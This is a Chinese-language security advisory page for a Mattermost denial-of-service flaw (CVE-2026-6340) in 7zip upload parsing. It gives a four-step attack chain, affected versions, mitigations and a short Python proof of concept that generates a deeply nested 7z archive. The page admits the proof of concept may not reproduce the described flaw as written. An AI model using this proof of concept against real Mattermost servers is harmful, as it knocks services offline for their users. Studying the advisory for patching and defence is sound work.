CVE-2026-6340 CVSS 4.3 中危

CVE-2026-6340: Mattermost 7zip解析内存耗尽漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6340

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Mattermost

漏洞概述

Mattermost 在处理 7zip 压缩文件时存在安全漏洞。由于未能在解压前验证归档文件的内部结构，攻击者可利用此缺陷上传包含大量文件夹声明的恶意 7zip 文件。这会导致服务器在处理过程中耗尽内存资源，从而引发拒绝服务。该漏洞影响特定版本的 Mattermost，且仅需低权限用户即可触发。

技术细节

该漏洞源于 Mattermost 在处理用户上传的 7zip 归档文件时，缺少对归档结构的完整性校验。具体来说，攻击者可以构造一个特制的 7zip 文件，其中包含过量的文件夹声明。当 Mattermost 尝试解析或解压该文件时，会盲目地分配内存以处理这些元数据结构。由于没有限制文件夹深度或数量，这种操作会迅速消耗服务器的可用内存资源，最终导致系统崩溃或无响应。攻击者利用路径为网络，且无需用户交互，属于典型的资源耗尽型 DoS 攻击。

攻击链分析

STEP 1

1. 身份认证

攻击者使用低权限账号登录 Mattermost 系统。

STEP 2

2. 构造恶意文件

攻击者创建包含过量文件夹声明的特制 7zip 文件。

STEP 3

3. 上传文件

通过文件上传功能将恶意 7zip 文件发送至服务器。

STEP 4

4. 触发解析

服务器处理文件时因未校验结构而耗尽内存，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept: Create a malicious 7zip file with excessive folders
# This script generates a 7zip archive containing a deeply nested directory structure
# which can trigger memory exhaustion in vulnerable Mattermost versions.

import py7zr
import os

# Create a temporary directory structure
depth = 10000
base_path = 'malicious_payload'

# Generate deep path (simulation of excessive folder declarations)
# Note: Actual exploitation may require specific binary manipulation of 7zip headers.
path = os.path.join(base_path, *['folder'] * depth)
os.makedirs(path, exist_ok=True)

# Create a dummy file at the end
with open(os.path.join(path, 'trigger.txt'), 'w') as f:
    f.write('DoS Trigger')

# Compress to 7z
with py7zr.SevenZipFile('exploit.7z', 'w') as archive:
    archive.writeall(base_path, 'base')

print('Malicious 7zip file generated: exploit.7z')

影响范围

Mattermost 11.5.x <= 11.5.1

Mattermost 10.11.x <= 10.11.13

Mattermost 11.4.x <= 11.4.3

防御指南

临时缓解措施

建议立即限制 7zip 格式文件的上传，或部署应用层防火墙检测异常文件结构。最有效的措施是应用官方补丁升级至安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6340
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6340
3 Details https://www.cvedetails.com/cve/CVE-2026-6340/
4 VulDB https://vuldb.com/cve/CVE-2026-6340
5 Link https://mattermost.com/security-updates

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表